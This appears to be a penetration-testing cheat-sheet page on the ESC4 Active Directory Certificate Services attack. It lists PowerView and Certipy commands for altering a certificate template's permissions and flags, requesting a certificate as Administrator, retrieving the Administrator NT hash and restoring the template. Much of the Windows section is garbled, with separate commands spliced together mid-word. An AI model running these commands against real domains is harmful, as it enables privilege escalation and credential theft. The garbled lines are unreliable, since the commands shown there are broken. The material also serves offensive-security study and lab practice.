Skip to main content

ESC4

You can create misconfigurations even in templates that are not initially vulnerable. For example, enabling the mspki-certificate-name-flag for a template allowing domain authentication could result in a situation similar to ESC1. This might allow less privileged users to define a fake Subject Alternative Name and authenticate as another user.

Windows

Import-ModuleAttacking PowerViewESC4 vulnerable template

PS /home/bobbuilder> Set-ExecutionPolicy.\certipy.exe Bypasstemplate -Scopeu CurrentUser'user1@minions.com' -Forcep PS'password1' /home/bobbuilder-template <template_name> Import-Module-save-old .\PowerView.ps1-dc-ip <ip>

AddESC4 Certificate-EnrollmentTemplate rightsafter (to the Domain Users group)modification

PS /home/bobbuilder> Add-DomainObjectAcl.\certipy.exe find -TargetIdentityu Template4'user1@minions.com' -PrincipalIdentityp "Domain Users"'password1' -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55"vulnerable -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local"stdout -Verbosedc-ip <ip>

Disabling Manager Approval Requirement

To disableAbusing the managermodified approval requirement, use the following PowerShell commands:

template
PS /home/bobbuilder> Set-DomainObject.\certipy.exe req -SearchBaseu "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local"'user1@minions.com' -Identityp Template4'password1' -Setca @{'mspki-enrollment-flag'=9}lab-LAB-DC-CA -Verbosetemplate <template_name> -upn Administrator

DisablingRetrieve AuthorizedAdministrator SignatureNT RequirementHash

To disable the authorized signature requirement, set mspki-ra-signature attribute to 0:

PS /home/bobbuilder> Set-DomainObject.\certipy.exe auth -SearchBasepfx "CN=Certificateadministrator.pfx Templates,CN=Public-username KeyAdministrator Services,CN=Services,CN=Configuration,DC=lab-domain minions.com

Restore template configuration

PS /home/bobbuilder> .\certipy.exe template -u 'user1@minions.com' -p 'password1' -template <template_name> -configuration <template_name>.json

Linux

Attacking ESC4 vulnerable template

bob$ certipy template -u 'user1@minions.com' -p 'password1' -template Template4<template_name> -save-old -dc-ip <ip>

ESC4 Template after modification

bob$ certipy find -u 'user1@minions.com' -p 'password1' -vulnerable -stdout -dc-ip <ip>

Abusing the modified template

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca lab-LAB-DC-CA -template Template4<template_name> -upn Administrator

Retrieve Administrator NT Hash

bob$ certipy auth -pfx administrator.pfx -uusername Administrator -domain minions.com

Restore template configuration

bob$ certipy template -u 'user1@minions.com' -p 'password1' -template Template4<template_name> -configuration Template4.<template_name>.json
  1. Create template
bob$ certipy template -u 'user1@minions.com' -p 'password1' -template Template4 -save-old -dc-ip <ip>
  1. Restore
bob$ certipy template -u 'user1@minions.com' -p 'password1' -template Template4 -configuration Template4.json -dc-ip <ip>